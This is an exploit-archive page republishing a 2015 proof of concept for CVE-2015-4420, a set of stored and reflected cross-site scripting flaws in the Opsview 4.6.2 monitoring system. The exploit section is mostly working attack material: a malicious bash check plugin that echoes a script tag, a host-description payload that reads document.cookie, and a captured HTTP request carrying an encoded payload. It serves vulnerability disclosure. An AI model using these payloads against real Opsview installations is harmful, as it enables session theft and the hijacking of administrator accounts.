Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtDolev Farhi1337DAY-ID-23745
HistoryJun 13, 2015 - 12:00 a.m.

Opsview <= 4.6.2 - Multiple XSS Vulnerabilities

2015-06-1300:00:00
Dolev Farhi
0day.today
24
JSON

Exploit for php platform in category web applications

# Exploit title: Opsview 4.6.2 - Multiple XSS
# Date: 07-06-2015
# Vendor homepage: www.opsview.com
# Version: 4.6.2
# CVE: CVE-2015-4420
# Author: Dolev Farhi @dolevf
# Tested On: Kali Linux + Windows 7
 
# Details:
# --------
# Opsview is a monitoring system based on Nagios Core. Opsview is prone to several stored and reflected XSS vulnerabilities in the latest version
 
 
 
1. Stored XSS through a malicious check plugin
 
a. Create a plugin with the following content:
 
#!/bin/bash
echo '<script>alert("script0t0s")</script>'
exit 2
 
b. create a new check and assign this plugin.
 
c. once a host uses this check, navigate to the event page, the XSS will be injected.
 
d. once a user/admin acknowledges this critical event (exit 2), the code will be injected prior his acknowledgement.
 
 
 
2. Stored XSS in host profile
 
a. add a host
 
b. in the description of the host, add a description as the one below:
<script>alert(document.cookie)</script>
 
c. save settings
 
d. once a user/admin views the host settings, XSS will be injected.
 
 
3. Reflected XSS in Test service check page.
a. Add a new service check
 
b. Test the new service check against any host and provide in the command line the following <script>alert("test")</script>
 
c. the XSS will immediately reflect to the screen.
 
response output:
 
POST /state/service/166/exec HTTP/1.1
Host: 192.168.0.20
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.4.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.0.20/status/service?host_state=0&host_filter=handled&host=opsview
Content-Length: 105
Cookie: PHPSESSID=
auth_tkt=
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
 
plugin_args=%3Cscript%3Ealert(%22opsview%22)%3C%2Fscript%3E&_CSRFToken=0x84BCDAD00D5111E5988CB34E7AFD915

#  0day.today [2018-04-01]  #

Related

cvelist 1
exploitdb 1
cve 1
openvas 1
nvd 1
prion 1
exploitpack 1
cvelist
cvelist
CVE-2015-4420
2015-06-18 18:00:00
exploitdb
exploitdb
Opsview 4.6.2 - Multiple Cross-Site Scripting Vulnerabilities
2015-06-12 00:00:00
cve
cve
CVE-2015-4420
2015-06-18 18:59:04
openvas
openvas
Opsview Multiple Cross Site Scripting Vulnerabilities (Jun 2015)
2015-06-23 00:00:00
nvd
nvd
CVE-2015-4420
2015-06-18 18:59:04
prion
prion
Cross site scripting
2015-06-18 18:59:00
exploitpack
exploitpack
Opsview 4.6.2 - Multiple Cross-Site Scripting Vulnerabilities
2015-06-12 00:00:00
JSON
Related for 1337DAY-ID-23745
cvelist1exploitdb1cve1openvas1nvd1prion1exploitpack1